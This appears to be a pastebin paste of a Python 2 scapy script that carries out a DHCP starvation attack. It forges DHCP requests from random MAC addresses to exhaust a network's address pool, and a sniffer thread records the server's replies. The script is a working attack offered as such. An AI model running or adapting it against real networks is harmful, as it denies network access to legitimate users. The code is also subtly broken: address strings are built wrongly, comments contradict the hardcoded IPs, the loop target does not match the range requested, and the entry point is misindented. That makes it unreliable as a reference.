KRs9uvbx

· 9 years ago · Oct 13, 2016, 07:40 AM
1from scapy.all import *
2from time import sleep
3from threading import Thread
4
5class DHCPStarvation(object):
6    def __init__(self):
7		# Generated MAC stored to avoid same MAC requesting for different IP
8        self.mac = [""]
9
10		# Requested IP stored to identify registered IP
11        self.ip = []
12
13    def handle_dhcp(self, pkt):
14        if pkt[DHCP]:
15			# if DHCP server reply ACK, the IP address requested is registered
16			# 10.10.111.107 is IP for bt5, not to be starved
17            if pkt[DHCP].options[0][1] == 5 and pkt[IP].dst != "192.168.1.12":
18                self.ip.append(pkt[IP].dst)
19                print str(pkt[IP].dst) + " registered"
20
21			# Duplicate ACK may happen due to packet loss
22            elif pkt[DHCP].options[0][1] == 6:
23                print "NAK received"
24
25    def listen(self):
26	    # sniff DHCP packets
27        sniff(filter="udp and (port 67 or port 68)",
28        prn=self.handle_dhcp, store=0)
29
30    def start(self):
31        # start packet listening thread
32        thread = Thread(target=self.listen)
33        thread.start()
34        print "Starting DHCP starvation..."
35
36	    # Keep starving until all 100 targets are registered
37	    # 100~200 excepts 107 = 100d
38        while len(self.ip) < 254: self.starve()
39        print "Targeted IP address starved"
40
41    def starve(self):
42        for i in xrange(101):
43		    # don't request 10.10.111.107
44            if i == 7: continue
45
46		    # generate IP we want to request
47		    # if IP already registered, then skip
48            requested_addr = "192.168.1.12" + str(100 + i)
49            if requested_addr in self.ip:
50                continue
51
52		    # generate MAC, avoid duplication
53            src_mac = ""
54            while src_mac in self.mac:
55                src_mac = RandMAC()
56                self.mac.append(src_mac)
57
58		    # generate DHCP request packet
59            pkt = Ether(src=src_mac, dst="ff:ff:ff:ff:ff:ff")
60            pkt /= IP(src="0.0.0.0", dst="255.255.255.255")
61            pkt /= UDP(sport=68, dport=67)
62            pkt /= BOOTP(chaddr=RandString(12, "0123456789abcdef"))
63            pkt /= DHCP(options=[("message-type", "request"),
64		                            ("requested_addr", requested_addr),
65		                            ("server_id", "192.168.1.1"),
66		                            "end"])
67            sendp(pkt)
68            print "Trying to occupy " + requested_addr
69            sleep(0.2)  # interval to avoid congestion and packet loss
70
71    #if __name__ == "__main__":
72        starvation = DHCPStarvation()
73        starvation.start()